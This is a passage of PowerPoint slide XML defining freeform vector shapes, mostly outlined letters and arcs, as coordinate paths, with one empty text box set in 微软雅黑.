                  <a:pt x="1819021" y="256731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1851048" y="287350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1881670" y="319375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1910834" y="352755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1938488" y="387438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964583" y="423373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989065" y="460508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2011885" y="498793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2032990" y="538176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2052329" y="578605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2069850" y="620029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2085503" y="662397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099235" y="705657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2110996" y="749757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2120733" y="794647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2128397" y="840276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133934" y="886590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2137294" y="933541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2138312" y="976311"/>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01" name="Freeform 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207504" y="6018847"/>
            <a:ext cx="649605" cy="839469"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="649604" h="839470">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="46209" y="15393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91058" y="32985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134505" y="52696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176507" y="74448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217023" y="98160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256010" y="123756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293425" y="151154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="329227" y="180276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363374" y="211043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395822" y="243377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="426530" y="277197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455456" y="312425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482558" y="348981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507792" y="386788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531118" y="425765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552492" y="465834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571873" y="506915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589218" y="548930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604484" y="591799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="617631" y="635443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628616" y="679784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="637395" y="724742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643928" y="770238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648172" y="816193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649119" y="839152"/>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02" name="Freeform 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6024383" y="5979000"/>
            <a:ext cx="1183640" cy="879475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1183640" h="879475">
                <a:moveTo>
                  <a:pt x="0" y="878998"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2503" y="838135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7831" y="791134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15658" y="744071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26026" y="697022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38977" y="650069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54372" y="603854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71966" y="559000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91680" y="515549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113434" y="473544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137150" y="433026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162749" y="394038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190151" y="356622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="219277" y="320820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250048" y="286674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282386" y="254226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316210" y="223519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351442" y="194595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388003" y="167496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425814" y="142264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464795" y="118941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504867" y="97570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545952" y="78192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587970" y="60850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630841" y="45586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="674488" y="32442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718831" y="21460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="763790" y="12683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809287" y="6152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855242" y="1910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901577" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="948211" y="462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="995067" y="3339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042065" y="8674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089126" y="16509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1136171" y="26886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183120" y="39846"/>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03" name="Freeform 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7474711" y="6219659"/>
            <a:ext cx="318770" cy="330835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="318770" h="330834">
                <a:moveTo>
                  <a:pt x="255397" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="221462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318643" y="330834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="255397"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04" name="TextBox 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251834" y="2430462"/>
            <a:ext cx="864869" cy="2033905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="50768" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="l">
              <a:lnSpc>
                <a:spcPct val="8406000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="6600" b="1" spc="9">
              <a:solidFill>
                <a:srgbClr val="3C7CB3">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Freeform 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2585720" y="1750060"/>
            <a:ext cx="383540" cy="304800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="383539" h="304800">
                <a:moveTo>
                  <a:pt x="383286" y="155193"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="369871" y="90646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="329692" y="41528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268144" y="10382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190881" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150780" y="2526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82010" y="22770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30003" y="62682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3333" y="118308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="151764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3192" y="185864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28771" y="242062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78920" y="281755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147639" y="301896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188594" y="304418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231288" y="301968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269255" y="294624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330962" y="265302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370173" y="218249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383286" y="155193"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Freeform 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489326" y="4955921"/>
            <a:ext cx="576580" cy="452120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="576580" h="452120">
                <a:moveTo>
                  <a:pt x="576326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576326" y="451611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="451611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="287273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="287273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Freeform 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489326" y="4257421"/>
            <a:ext cx="576580" cy="512445"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="576580" h="512445">
                <a:moveTo>
                  <a:pt x="576326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576326" y="133857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213995" y="369061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197562" y="379634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184451" y="387921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174650" y="393922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168148" y="397636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168148" y="399541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220797" y="396095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="395858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="512317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="512317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="386587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372872" y="142493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410090" y="119866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419735" y="114934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419735" y="113029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402832" y="114530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381857" y="115601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356834" y="116244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327787" y="116458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Freeform 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489326" y="3714496"/>
            <a:ext cx="576580" cy="341630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="576580" h="341629">
                <a:moveTo>
                  <a:pt x="576326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576326" y="327786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="327786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="122681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340106" y="122681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340106" y="313181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240030" y="313181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240030" y="122681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100456" y="122681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100456" y="341121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="341121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Freeform 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489326" y="3079495"/>
            <a:ext cx="576580" cy="452120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="576580" h="452120">
                <a:moveTo>
                  <a:pt x="576326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576326" y="451612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="451612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="287274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="287274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Freeform 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489326" y="2380995"/>
            <a:ext cx="576580" cy="512445"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="576580" h="512444">
                <a:moveTo>
                  <a:pt x="576326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576326" y="133857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213995" y="369062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197562" y="379634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184451" y="387921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174650" y="393922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168148" y="397637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168148" y="399541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220797" y="396095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="395858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="512317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="512317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="386588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372872" y="142493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410090" y="119866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419735" y="114934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419735" y="113029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402832" y="114530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381857" y="115601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356834" y="116244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327787" y="116458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Freeform 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2479294" y="5562219"/>
            <a:ext cx="596265" cy="390525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="596264" h="390525">
                <a:moveTo>
                  <a:pt x="596011" y="223240"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="594651" y="263776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590565" y="300915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583741" y="334656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574167" y="364997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458724" y="364997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475986" y="334749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="488330" y="302031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495746" y="266846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="498220" y="229196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497177" y="207639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="481711" y="156641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450421" y="131174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437133" y="129476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="426206" y="130640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385871" y="160805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360483" y="206758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="345313" y="239991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326596" y="279601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287734" y="338664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246133" y="372199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197365" y="388296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170053" y="390309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131000" y="386634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67754" y="357240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24485" y="299033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10874" y="260359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2716" y="215499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2000" y="117202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8000" y="74420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18002" y="36113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32004" y="2285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155194" y="2285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129950" y="38229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111934" y="76561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101133" y="117275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97536" y="160362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98609" y="183920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107233" y="221683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134556" y="254869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159257" y="261200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170809" y="259943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214893" y="226945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243139" y="173924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="260095" y="135064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285105" y="86441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314267" y="48623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347585" y="21610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385068" y="5402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="426719" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464675" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="527107" y="34445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571043" y="94281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584930" y="132314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="593244" y="175301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596011" y="223240"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
